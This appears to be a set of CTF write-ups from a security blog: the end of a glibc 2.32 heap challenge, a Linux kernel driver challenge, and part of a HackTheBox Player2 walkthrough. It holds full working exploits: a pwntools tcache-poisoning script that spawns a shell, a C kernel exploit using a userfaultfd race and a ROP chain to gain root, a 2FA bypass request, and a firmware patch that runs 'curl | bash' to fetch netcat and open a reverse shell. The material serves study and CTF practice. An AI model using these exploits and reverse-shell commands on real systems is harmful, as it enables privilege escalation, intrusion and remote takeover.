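stored = (heap_base + 0x2A0) >> 12    # what the freed chunk's fd slot holds
clobbered = (stored & ~0xFF) | 0x0A   # our one-byte read (a newline) overwrote the low byte
candidates = heap_base_candidates(clobbered)
print(len(candidates), heap_base in candidates)
```

256 guesses is cheap locally, but with a 3-byte proof of work in front of every remote attempt it adds up quickly.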

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in a long run of characters that match its format specifier, it starts allocating buffers on the heap. For example, if we send in 0x500 '1's, scanf will make a largebin-sized allocation request. As those familiar with the heap might know, a largebin-sized request triggers malloc_consolidate() (source), which goes through the freed fastbins and consolidates them into the unsorted bin (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), processing the large request sorts the chunk from the unsorted bin into a largebin. On the next allocation, that largebin chunk is split: the piece we get back still holds stale heap pointers, which gives us a heap leak, and the remainder is placed into the unsorted bin, from which we can easily grab a libc leak on the following allocation (feel free to debug this with my exploit below if it seems confusing). This method of leaking only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leaks, some basic math lets us abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also ensures that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer use the unaligned trick for fastbin dup here. We have to rely on tcache poisoning instead, and an evil obfuscated pointer can be created by xoring the address of the fd, right shifted by 12 bits, with the target location.
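In code, the poisoned value is just the encoding step applied to the target. This sketch (hypothetical helper name) also rejects targets that are not 16-byte aligned, since glibc 2.32 aborts when a tcache entry is misaligned. Here fd_slot_addr plays the role of heapleak + 0x60 in the final exploit, and the addresses in the usage are invented.

```python
MALLOC_ALIGNMENT = 0x10   # x86-64


def poisoned_fd(fd_slot_addr: int, target: int) -> int:
    """Value to write over a freed tcache chunk's fd so that a later malloc returns target."""
    if target % MALLOC_ALIGNMENT:
        raise ValueError("target must be 16-byte aligned for glibc 2.32 tcache")
    return (fd_slot_addr >> 12) ^ target


fd_slot_addr = 0x55D4C3A1F360   # made-up; plays the role of heapleak + 0x60
target = 0x7F2A1B3C4E40         # made-up, 16-byte aligned hook address
evil = poisoned_fd(fd_slot_addr, target)
# malloc decodes with the same key, so the next tcache entry becomes target
print(hex(evil), hex((fd_slot_addr >> 12) ^ evil))
```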

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:

from pwn import *
import proofofwork
elf = ELF('./dr_xorisaurus')
libc = ELF('./')
# p = process(['disable_sigalarm', elf.path])
p = remote('', 9200)
proof = p.recv(0x22).split(' ')[-2][:-1]
log.info('Proving based on: %s' % proof)
proof = proofofwork.sha256(proof)
log.info('Proof: %s' % proof)
p.sendline(proof)
log.info('Starting pwn')
def wait():
def alloc(size, data):
def show(idx):
def free(idx):
def uaf(idx, data):
def trigger_consolidate(size):
assert(size >= 0x500)
#creating and freeing enough fastbins to help give us largebin when triggering malloc_consolidate with scanf()
for i in range(20):
    alloc(0x77, 'aaaaaa')
#leaving 1 unfreed to prevent top consolidation
for i in range(19): #leaves idx 19
    free(i)
#should get a largebin now
alloc(0x60, 'A' * 16)
heapleak = u64(p.recv(6).ljust(8, '\x00')) + 0xf6
log.info('heap leak: 0x%x' % heapleak)
alloc(0x60, '')
libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x1b8c0a
log.info('libc base: 0x%x' % libc.address)
#bypassing safe linking
alloc(0x50, '')
alloc(0x50, '')
#P' = (L >> 12) ^ P
#L is address, P is the pointer it should hold
evil_obfs = ((heapleak + 0x60) >> 12) ^ (libc.symbols['__free_hook'])
free(1) #need more than one because tcache count
alloc(0x50, '')
uaf(0, p64(evil_obfs))
alloc(0x50, '')
alloc(0x50, p64(libc.symbols['system']))
alloc(0x60, '/bin/sh')

Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.

CUCTF 2020 Hotrod Kernel Writeup (Userfaultfd Race + Kernel UAF + Timerfd_Ctx Overwrite)

Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020; Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.

Before I start, I would like to acknowledge and give appropriate credit to all the links (posted throughout this article) I studied off of to make both this challenge and my exploit possible.

If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.

Opening this challenge up, it looks like a standard kernel pwn setup: a file system, a bzImage, and a qemu launch script are given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:

find . | cpio --create --format='newc' > ../initramfs.cpio
cpio -id < initramfs.cpio
The qemu launch script is the following:

qemu-system-x86_64 \
-s \
-m 64M \
-nographic \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
-no-reboot \
-cpu qemu64,+smep \
-monitor /dev/null \
-initrd "./initramfs.cpio" \
-smp 2 \
-smp cores=2 \
-smp threads=1
This tells us that SMEP, KPTI, and KASLR are enabled, but there is no SMAP (which simplifies this a lot).

We can also use vmlinux-extract to help extract the kernel from its compressed file. The driver itself is hotrod.ko based on the startup script (and the name of the challenge). Now, let's do a quick analysis of the driver.

Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device has a file_operations struct where only the unlocked_ioctl field is populated. Looking through hotrod_ioctl, one can also infer that there is a global struct, located at 0x7e0 relative to the module base, storing both a size (as an unsigned long) and a pointer to an allocated chunk. The handler implements add, show, delete, and edit operations, each of which can only be used once (and you only get one hotrod total). Alloc occurs when the ioctl command is 0xBAADC0DE.

It checks whether you have already attempted an allocation and whether the hotrod has already been populated. If not, it allocates a chunk for the hotrod and sets its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl command is 0xC001C0DE.

Again, proper checks are ensured, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.

Again, it seems quite safe. We can use this for a leak after we allocate and free certain kernel structures though since kmalloc() doesn't zero out memory. Lastly, edit occurs with argument 0xDEADC0DE.

Again, it seems pretty safe. Like the viewing function, it interprets the argument as a hotrod struct. The sizes for editing (as well as for viewing earlier on) are both checked, so there is no going out of bounds or overflowing. In edit's case, if the size check passes, it copies the user's data into the kernel hotrod's car.

Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutexes were never used, opening this up to race conditions.

Due to the size checks and the restriction to use each feature only once, a good race strategy is to launch edit in one thread and, in another thread, quickly free the chunk and allocate a different kernel structure over it, timed so that edit's second copy_from_user() writes through a chunk pointer that was fetched before the free but now refers to the new object. A great way to race reliably is with the userfaultfd syscall. With userfaultfd, we can register a page fault handler for a page we mmap in userspace; even when the page fault comes from the kernel accessing that page, our handler runs, so we can stall the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is actually an extremely common technique to reliably race in the kernel, with several articles and CTF challenges built around this concept (such as the famous Balsn CTF KrazyNote challenge):

There does seem to be a recent hardening against this method of attack, as mentioned here, but it is not enabled by default for compatibility reasons.

From our exploit's perspective, we can have one thread call edit and have it copy over a user hotrod struct whose data, or "car," pointer points to a page we set up a userfaultfd handler for. Then, during edit's second copy_from_user(), the kernel page faults when it tries to copy from our pointer, and our handler takes over, freeing the hotrod and allocating other kernel structures over the same region. Then, we unblock the thread by copying over the data we want placed there. Personally, I kept all the original data in the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I changed to a stack pivot. After the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.

Due to our chunk size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct: we can allocate it with a timerfd_create() call using the CLOCK_REALTIME option (other options will also work) followed by a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the field that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a time period that you control in the itimerspec struct. This structure has been documented before in ptr-yudai's article about useful kernel structures, this paper about exploitable structures, and GNote from TokyoWesterns 2019. Note that for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread with a getchar() while waiting for the function pointer to trigger.
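The leak and the later pivot boil down to a bit of address arithmetic. This sketch uses the offsets hard-coded in my exploit (they only hold for this challenge's kernel build) and a made-up leaked value. It assumes, as the exploit's pivot_target = xchg_eax_esp & 0xffffffff implies, that rax holds the gadget's own address when the overwritten function pointer is called; since xchg eax, esp operates on 32-bit registers, rsp becomes the zero-extended low 32 bits of that address, which is a userspace address we can mmap.

```python
# Offsets taken from the #defines in the exploit; they only apply to this challenge's kernel.
TIMERFD_TMRPROC_OFFSET = 0x102A00
XCHG_EAX_ESP_OFFSET = 0x89FF2
COMMIT_CREDS_OFFSET = 0x537D0
INIT_CRED_OFFSET = 0x837620


def rebase(timerfd_tmrproc_leak: int) -> dict:
    kbase = timerfd_tmrproc_leak - TIMERFD_TMRPROC_OFFSET
    xchg_eax_esp = kbase + XCHG_EAX_ESP_OFFSET
    # xchg eax, esp zero-extends into rsp, so the new stack is the low 32 bits
    # of the gadget address (assuming rax holds that address at call time)
    pivot_target = xchg_eax_esp & 0xFFFFFFFF
    return {
        "kbase": kbase,
        "commit_creds": kbase + COMMIT_CREDS_OFFSET,
        "init_cred": kbase + INIT_CRED_OFFSET,
        "xchg_eax_esp": xchg_eax_esp,
        "pivot_target": pivot_target,
        "fake_stack_page": pivot_target & ~0xFFF,   # page to mmap in userspace
    }


r = rebase(0xFFFFFFFF9A302A00)   # made-up leak of timerfd_tmrproc
print({k: hex(v) for k, v in r.items()})
```

A cheap sanity check on a real leak is that the computed kernel base should be 2 MiB aligned under the usual KASLR configuration; if it isn't, the leak probably came from the wrong slot.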

To grab a leak, I had to spray these structs in the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate its data there so we could grab the leak reliably. With the KASLR leak, we can rebase the entire kernel relative to the startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot to a userspace stack as there is no SMAP. Note that you need to specify a valid range for ropper/ROPgadget to search for gadgets; otherwise, it'll find gadgets that aren't in executable sections of the kernel. Take a look at the example below:

readelf -Wl vmlinux
Elf file type is EXEC (Executable file)
Entry point 0x1000000
There are 4 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x200000 0xffffffff81000000 0x0000000001000000 0x6bc950 0x6bc950 R E 0x200000
LOAD 0xa00000 0xffffffff81800000 0x0000000001800000 0x050000 0x050000 RW 0x200000
LOAD 0xa50000 0xffffffff81850000 0x0000000001850000 0x07a1cb 0x1cc000 RWE 0x200000
NOTE 0x8bc914 0xffffffff816bc914 0x00000000016bc914 0x00003c 0x00003c 0x4
Section to Segment mapping:
Segment Sections...
00 .text .rodata .pci_fixup __ksymtab __ksymtab_gpl __ksymtab_strings __param __modver __ex_table .notes
01 .data _kprobe_blacklist .vvar
02 .init.text .altinstr_aux .x86_cpu_dev.init .altinstructions .altinstr_replacement .iommu_table .apicdrivers .exit.text .bss .brk
03 .notes
ROPgadget --binary vmlinux --range 0xffffffff81000000-0xFFFFFFFF816BC950
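Pulling those ranges out of the readelf output by hand gets tedious, so here is a small Python sketch (hypothetical helper) that parses the LOAD lines shown above and prints a ROPgadget command for each executable segment. The first range matches the command above. The third (RWE) segment holds .init.text and the other init sections, which as far as I know are normally freed after boot, so gadgets found there are likely unusable.

```python
READELF_LOAD_LINES = """\
LOAD 0x200000 0xffffffff81000000 0x0000000001000000 0x6bc950 0x6bc950 R E 0x200000
LOAD 0xa00000 0xffffffff81800000 0x0000000001800000 0x050000 0x050000 RW 0x200000
LOAD 0xa50000 0xffffffff81850000 0x0000000001850000 0x07a1cb 0x1cc000 RWE 0x200000
"""


def executable_ranges(readelf_text: str) -> list:
    """Return (start, end) virtual address ranges of executable LOAD segments."""
    ranges = []
    for line in readelf_text.splitlines():
        fields = line.split()
        if not fields or fields[0] != "LOAD":
            continue
        # Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg... Align
        vaddr, memsz = int(fields[2], 16), int(fields[5], 16)
        flags = "".join(fields[6:-1])   # "R E" shows up as two tokens
        if "E" in flags:
            ranges.append((vaddr, vaddr + memsz))
    return ranges


for start, end in executable_ranges(READELF_LOAD_LINES):
    print(f"ROPgadget --binary vmlinux --range {start:#x}-{end:#x}")
```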

Since KPTI and SMEP are both enabled, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by switching between the two sets via bit 12 of the CR3 register (the userspace portion of the kernel page tables is set to NX, and the only additional information given to the userspace page tables is what is necessary to enter and exit the kernel). Instead, it is better to rely on a KPTI trampoline (swapgs_restore_regs_and_return_to_usermode) and have it fix CR3 for us so we can go back; this functionality exists in the kernel because it needs to handle the transition for routines like syscalls. I usually add +0x16 to where this is located, just so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline combined with a commit_creds(init_cred) beforehand to change my uid to 0, I can then return to whichever function I choose in my userspace code with root privileges. Of course, I needed to specify the cs, ss, rflags, and stack for the trampoline to return to as well (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS); I just used the values I saved beforehand in the userspace process.
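Here is a Python sketch of the chain layout that paragraph describes (my reading of it, not a byte-for-byte copy of the exploit's rop[] array): commit_creds(init_cred), then the trampoline entered at +0x16, followed by the seven slots it reads. All addresses in the usage are placeholders; 0x33 and 0x2b are the usual x86-64 Linux user CS and SS selectors.

```python
import struct


def kpti_return_chain(pop_rdi, init_cred, commit_creds, kpti_trampoline,
                      user_rip, user_cs, user_rflags, user_sp, user_ss) -> bytes:
    """Pack commit_creds(init_cred) followed by a return through the KPTI trampoline.

    kpti_trampoline is assumed to already include the +0x16 skip, so it starts at
    movq %rsp, %rdi and reads RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS from the stack.
    """
    chain = [
        pop_rdi, init_cred,     # rdi = &init_cred
        commit_creds,           # commit_creds(&init_cred)
        kpti_trampoline,        # restores the user CR3, then swapgs + iretq
        0,                      # RDI slot (dummy)
        0,                      # orig_ax slot (dummy)
        user_rip, user_cs, user_rflags, user_sp, user_ss,
    ]
    return struct.pack(f"<{len(chain)}Q", *chain)


# placeholder addresses; a real exploit would use the rebased kernel symbols
chain = kpti_return_chain(0x1111, 0x2222, 0x3333, 0x4444,
                          0x401000, 0x33, 0x246, 0x7FFC0000, 0x2B)
print(len(chain))
```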

In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing open read write in my function. I also had to just halt the OS; otherwise, the kernel panics on the return, hangs, and then somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.

Below is my exploit with comments and linked resources:

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <pthread.h>
#include <poll.h>
#include <sys/reboot.h>
#include <linux/userfaultfd.h>  // struct uffd_msg, struct uffdio_*, UFFD_API, UFFD_EVENT_PAGEFAULT

#define ALLOC 0xBAADC0DE
#define EDIT 0xDEADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define TIMERFD_TMPROC_OFFSET 0x102a00
#define COMMIT_CREDS_OFFSET 0x537d0
#define INIT_CRED_OFFSET 0x837620
#define XCHG_EAX_ESP_OFFSET 0x89ff2
#define POP_RDI_OFFSET 0xb689d
#define KPTI_TRAMPOLINE_OFFSET (0x200cb0 + 0x16) // swapgs_restore_regs_and_return_to_usermode, + 0x16 to skip regs
#define MOV_RAX_RDI_AND_RAX_OFFSET 0x17bab // mov rax, rdi ; and rax, 0xfffffffffffffff0 ; ret
#define POP_RCX_OFFSET 0x18a8d3
#define POP_R11_POP_R12_POP_RBP_OFFSET 0x8b7d
// gcc exploit.c -o exploit -static -pthread -masm=intel
// transfer with b64 + gzip
// dumped values from kernel module with printk because elixir showed them as layers of nested macros
// (guarded, since <linux/userfaultfd.h> already defines them)
#ifndef UFFDIO_API
#define UFFDIO_API 0xc018aa3f
#endif
#ifndef UFFDIO_REGISTER
#define UFFDIO_REGISTER 0xc020aa00
#endif
#ifndef UFFDIO_COPY
#define UFFDIO_COPY 0xc028aa03
#endif

typedef struct
{
    unsigned long size;
    char *data;
} req_t;

static int fd;
static pthread_t thread;
static unsigned long long leaks[0x100/8];
static unsigned long long kbase, timerfd_tmrproc, commit_creds, init_cred, xchg_eax_esp, pop_rdi, kpti_trampoline;
static unsigned long long addr;

// ioctl wrapper
int ioctl(int fd, unsigned long request, unsigned long param)
{
    return syscall(16, fd, request, param);
}

// helper functions
int alloc(int fd, unsigned long size)
{
    return ioctl(fd, ALLOC, size);
}

int delete(int fd)
{
    return ioctl(fd, FREE, 0);
}

int edit(int fd, unsigned long size, char *src)
{
    req_t req;
    req.size = size;
    req.data = src;
    return ioctl(fd, EDIT, (unsigned long)&req);
}

int show(int fd, unsigned long size, char *dest)
{
    req_t req;
    req.size = size;
    req.data = dest;
    return ioctl(fd, SHOW, (unsigned long)&req);
}

// function to return to once we become root
void pwned()
{
    int flag_fd;
    char flag[0x50];
    printf("uid: %d\n", getuid());
    flag_fd = open("/flag", O_RDONLY);
    read(flag_fd, flag, 0x50);
    write(1, flag, 0x50);
    // halt the OS instead of returning (RB_HALT_SYSTEM assumed)
    reboot(RB_HALT_SYSTEM);
}

// based on
// based on
void *racer(void *arg)
{
    struct uffd_msg uf_msg;
    struct uffdio_copy uf_copy;
    long uffd = (long)arg;
    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    while (poll(&pollfd, 1, -1) > 0)
    {
        if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP)
        {
            perror("polling error");
            exit(-1);
        }
        // reading the event
        if (read(uffd, &uf_msg, sizeof(uf_msg)) == 0)
        {
            perror("error reading event");
            exit(-1);
        }
        if (uf_msg.event != UFFD_EVENT_PAGEFAULT)
        {
            perror("unexpected result from event");
            exit(-1);
        }
        puts("caught a race");
        puts("triggering a deletion");
        delete(fd);
        struct itimerspec timespec = {{10, 0}, {10, 0}};
        int tfd = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd, 0, &timespec, 0);
        puts("allocated timerfd_ctx struct");
        // now copy over edit data
        char uf_buffer[0x1000];
        leaks[5] = xchg_eax_esp;
        memset(uf_buffer, 0, sizeof(uf_buffer));
        memcpy(uf_buffer, &leaks, 0x30);
        uf_copy.src = (unsigned long)uf_buffer;
        uf_copy.dst = addr;
        uf_copy.len = 0x1000;
        uf_copy.mode = 0;
        uf_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, (unsigned long)&uf_copy) == -1)
        {
            perror("uffdio_copy error");
            exit(-1);
        }
        puts("race successfully finished");
        // park this thread
        while (1)
            sleep(1);
    }
    return 0;
}

void register_userfault()
{
    int uffd, race;
    struct uffdio_api uf_api;
    struct uffdio_register uf_register;
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    uf_api.api = UFFD_API;
    uf_api.features = 0;
    // creating userfaultfd for race condition because using unlocked_ioctl without locking mutexes
    if (ioctl(uffd, UFFDIO_API, (unsigned long)&uf_api) == -1)
    {
        perror("error with the uffdio_api");
        exit(-1);
    }
    // page for userfaultfd
    if (mmap((void *)addr, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) != (void *)addr)
    {
        perror("whoopsie doopsie on mmap");
        exit(-1);
    }
    uf_register.range.start = addr;
    uf_register.range.len = 0x1000;
    uf_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    // uffd will change when the kernel thread page faults here and hangs
    if (ioctl(uffd, UFFDIO_REGISTER, (unsigned long)&uf_register) == -1)
    {
        perror("error registering page for userfaultfd");
        exit(-1);
    }
    race = pthread_create(&thread, NULL, racer, (void *)(long)uffd);
    if (race != 0)
    {
        perror("can't setup threads for race");
        exit(-1);
    }
}

int main(int argc, char **argv)
{
    fd = open("/dev/hotrod", O_RDWR);
    if (fd < 0)
    {
        perror("failed opening device");
        exit(-1);
    }
    // spray to increase exploit reliability
    for (int i = 0; i < 0x100; i++)
    {
        struct itimerspec timespec = {{0, 0}, {100, 0}};
        int tfd = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd, 0, &timespec, 0);
    }
    puts("finished initial spray");
    struct itimerspec timespec = {{10, 0}, {10, 0}};
    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    // refer to usage of this for leaks
    timerfd_settime(tfd, 0, &timespec, 0);
    // free the last sprayed timerfd_ctx so the hotrod allocation lands on it
    close(tfd);
    alloc(fd, 0xe0);
    show(fd, 0xe0, (char *)leaks);
    timerfd_tmrproc = leaks[5];
    kbase = timerfd_tmrproc - TIMERFD_TMPROC_OFFSET;
    init_cred = kbase + INIT_CRED_OFFSET;
    commit_creds = kbase + COMMIT_CREDS_OFFSET;
    xchg_eax_esp = kbase + XCHG_EAX_ESP_OFFSET;
    pop_rdi = kbase + POP_RDI_OFFSET;
    kpti_trampoline = kbase + KPTI_TRAMPOLINE_OFFSET;
    printf("Kernel base: 0x%llx\n", kbase);
    printf("init_cred: 0x%llx\n", init_cred);
    printf("commit_creds: 0x%llx\n", commit_creds);
    printf("xchg_eax_esp: 0x%llx\n", xchg_eax_esp);
    printf("pop_rdi: 0x%llx\n", pop_rdi);
    printf("kpti_trampoline: 0x%llx\n", kpti_trampoline);
    // mmap page for rop chain
    unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
    unsigned long *fake_stack = mmap((void *)(pivot_target & 0xfffff000), 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, -1, 0);
    if (fake_stack == MAP_FAILED)
    {
        perror("fake stack mmap error");
        exit(-1);
    }
    // saving state
    unsigned long long user_rflags, user_cs, user_ss, user_sp;
    asm volatile(
        "mov %0, %%cs\n"
        "mov %1, %%ss\n"
        "mov %2, %%rsp\n"
        "pushf\n"
        "pop %3\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags)
        :
        : "memory"
    );
    // rop chain to make me root and return to pwned
    unsigned long long rop[] =
    {
        pop_rdi,
        init_cred,
        commit_creds,
        kpti_trampoline,
        0,                      // rdi
        0,                      // orig_ax
        (unsigned long)pwned,   // rip
        user_cs,
        user_rflags,
        user_sp,
        user_ss
    };
    memcpy((void *)pivot_target, rop, sizeof(rop));
    puts("finished writing rop chain to mmap'd page");
    // now trigger userfaultfd race
    addr = 0x10000;
    register_userfault();
    puts("finished registering userfaultfd page for race condition");
    puts("triggering userfaultfd");
    edit(fd, 0x30, (char *)addr);
    // hang here until the corrupted timer fires
    getchar();
    return 0;
}

To transfer the exploit to the remote instance, I just compiled it statically with gcc, gzip'd it, and then transferred it with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one were really working under time constraints, compiling against a more minimalistic library like musl or uclibc could help. Here's the final result:

If I made any mistakes in my explanations above, feel free to let me know so I can correct them. I'm still continuing to study the Linux kernel and find it quite fascinating! Thanks again to CUCTF for hosting the event!

For those interested in trying this problem out, it is archived in the CUCTF repos.

Saturday, June 27, 2020

Player2 HacktheBox Writeup

Player2 was a challenging but very fun box by MrR3boot and b14ckh34rt. The highlight of the box for me is the finale 2.29 heap pwn!  In my opinion, if there were no unintended routes, this would have been by far the hardest box so far, but some of these alternative solutions were never patched.

On the initial enum, we find on player2.htb a link to product.player2.htb regarding the Protobs product. It's a login page, so it's time to hopefully find some creds. An initial nmap port scan also shows the following ports: 22, 80, 8545. Going to port 8545, we see an invalid twirp route message, giving away the fact that twirp is used on this box. While dirbing player2.htb, we also come across the proto directory. Documentation at this point basically told me what to do:

From the proto directory, let's try to find some configuration info by fuzzing for the .proto file.  Using some different wordlists with wfuzz on /proto/FUZZ.proto, I came across generated.proto:

syntax = "proto3";

package twirp.player2.auth;
option go_package = "auth";

service Auth {
  rpc GenCreds(Number) returns (Creds);
}

message Number {
  int32 count = 1; // must be > 0
}

message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;
}

Note how twirp documentation mentions the route as the following:

POST /twirp/<package>.<Service>/<Method>

From the source above, the route will be twirp.player2.auth.Auth/GenCreds... some nice credentials should come from here!

Using the twirp documentation with curl, I played around and curled to the service route based on the format from the documentation.

curl -X POST "http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds" --header "Content-Type:application/json" --data '{}'
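The same call can be built with Python's standard library. This sketch only constructs the request (it does not send it), which makes the route rule POST /twirp/<package>.<Service>/<Method> easy to see; the helper name is hypothetical.

```python
import json
import urllib.request


def twirp_request(host: str, package: str, service: str, method: str, body: dict):
    """Build (without sending) a Twirp JSON call: POST /twirp/<package>.<Service>/<Method>."""
    url = f"http://{host}/twirp/{package}.{service}/{method}"
    return urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


req = twirp_request("player2.htb:8545", "twirp.player2.auth", "Auth", "GenCreds", {})
print(req.get_method(), req.full_url)
# urllib.request.urlopen(req) would actually send it
```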

However, we end up getting a lot of different creds, and most of them don't work. I received the following:

With some different variations, I determined that the following worked:

However, once we log in, it asks for an OTP. It tells us that we can either use the OTP that was sent to our mobile or backup codes. I had noticed an api link from dirb originally. This page is called totp, which is a type of OTP, so, thinking logically, I tried /api/totp, and it actually worked. It also mentioned backup codes. Playing around, there seems to be an “action” parameter on the api. After a while, I figured out that sending the logged-in session id along with a request for “backup_codes” (a logical name for what we are looking for) gave us the TOTP.

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":"backup_codes"}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"


After rooting the box, hevr pointed out that there should be a type juggling attack here as the 2FA bypass:

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":0}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

Inside the following page, we see a mention of a PDF and a link to a firmware download. It mentions that the firmware is signed. Extracting the binary file from the tar, I opened it up in a hex editor and saw the ELF header appear 64 bytes into the file. It seems safe to assume that the first 64 bytes are the signature. Let's take out the first 64 bytes: dd if=Protobs.bin bs=64 skip=1 of=firmware.
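For reference, here is the same split in Python, as a sketch: it assumes the signature is exactly the first 64 bytes and checks that the ELF magic follows it. The blob in the usage is synthetic, not the real Protobs.bin.

```python
ELF_MAGIC = b"\x7fELF"
SIG_LEN = 64   # assumed signature size: the ELF header appears 64 bytes in


def split_firmware(blob: bytes, sig_len: int = SIG_LEN):
    """Python equivalent of `dd bs=64 skip=1`, returning (signature, elf)."""
    signature, elf = blob[:sig_len], blob[sig_len:]
    if not elf.startswith(ELF_MAGIC):
        raise ValueError("no ELF header right after the assumed signature")
    return signature, elf


fake_blob = b"S" * 64 + ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9   # synthetic stand-in for Protobs.bin
signature, elf = split_firmware(fake_blob)
print(len(signature), elf[:4])
```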

While reversing it, I noticed how the main function called another function, which in turn called system on a string.

0x004013c9      55             push rbp
|           0x004013ca      4889e5         mov rbp, rsp
|           0x004013cd      4883ec10       sub rsp, 0x10
|           0x004013d1      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=-1 ; '(' ; 40
|           0x004013da      488945f8       mov qword [local_8h], rax
|           0x004013de      31c0           xor eax, eax
|           0x004013e0      488d3dbd0c00.  lea rdi, qword str.stty_raw__echo_min_0_time_10 ; 0x4020a4 ; "stty raw -echo min 0 time 10"
|           0x004013e7      e884fcffff     call sym.imp.system         ; int system(const char *string)
|           0x004013ec      e8bffcffff     call sym.imp.getchar        ; int getchar(void)
|           0x004013f1      8945f4         mov dword [local_ch], eax
|           0x004013f4      837df41b       cmp dword [local_ch], 0x1b
|       ,=< 0x004013f8      7416           je 0x401410
|       |   0x004013fa      488d3dc00c00.  lea rdi, qword str.stty_sane ; 0x4020c1 ; "stty sane"
|       |   0x00401401      e86afcffff     call sym.imp.system         ; int system(const char *string)
|       |   0x00401406      bf00000000     mov edi, 0
|       |   0x0040140b      e8c0fcffff     call sym.imp.exit

We can patch the binary with dd so that it calls system on a different string. Because the patch is applied in place to Protobs.bin, the 64-byte signature stays attached at the front:

First, find the offset of the first stty string:
strings -t d Protobs.bin | grep stty

Then I created a “malicious” file whose contents the next dd would write over that string. It contained the following:
curl | bash

The “z” on my side is just a shell script containing the following:
curl -o /tmp/nc
chmod +x /tmp/nc
/tmp/nc 1337 -e /bin/sh

I kept the injected command short because I was being cautious: a string longer than the original would overwrite whatever follows it in the binary.

Finally, write the payload over the string in place:
dd if=malicious of=Protobs.bin obs=1 seek=8420 conv=notrunc
